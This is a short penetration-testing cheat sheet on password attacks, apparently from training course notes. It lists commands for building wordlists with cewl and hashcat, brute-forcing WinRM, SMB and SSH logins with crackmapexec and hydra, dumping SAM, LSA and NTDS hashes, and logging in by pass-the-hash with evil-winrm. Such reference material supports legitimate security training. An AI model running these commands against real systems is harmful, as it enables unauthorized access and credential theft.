Password-attacks
Password Mutations
# Generate a wordlist from a website
cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist
# Generate rule-based word list using Hashcat
hashcat --force password.list -r custom.rule --stdout > mut_password.list
# Generate potential usernames using username-anarchy\./username-anarchy -i /path/to/listoffirstandlastnames.txt
# Download a list of file extensions for password searching
curl -s https://fileinfo.com/filetypes/compressed | html2text | awk '{print tolower($1)}' | grep "\." | tee -a compressed_ext.txtRemote Password Attacks
# Brute-force WinRM service
crackmapexec winrm <ip> -u user.list -p password.list
# Enumerate SMB shares using specified credentials
crackmapexec smb <ip> -u "user" -p "password" --shares
# Attempt password cracking over specified service with Hydra
hydra -L user.list -P password.list <service>://<ip>
hydra -l username -P password.list <service>://<ip>
hydra -L user.list -p password <service>://<ip>
hydra -C <user_pass.list> ssh://<IP>
# Dump password hashes using CrackMapExec
crackmapexec smb <ip> --local-auth -u <username> -p <password> --sam
crackmapexec smb <ip> --local-auth -u <username> -p <password> --lsa
crackmapexec smb <ip> -u <username> -p <password> --ntds
# Establish a PowerShell session using Evil-WinRM
evil-winrm -i <ip> -u Administrator -H "<passwordhash>"Windows Local Password Attacks
Linux Local Password Attacks
Cracking Passwords
Last updated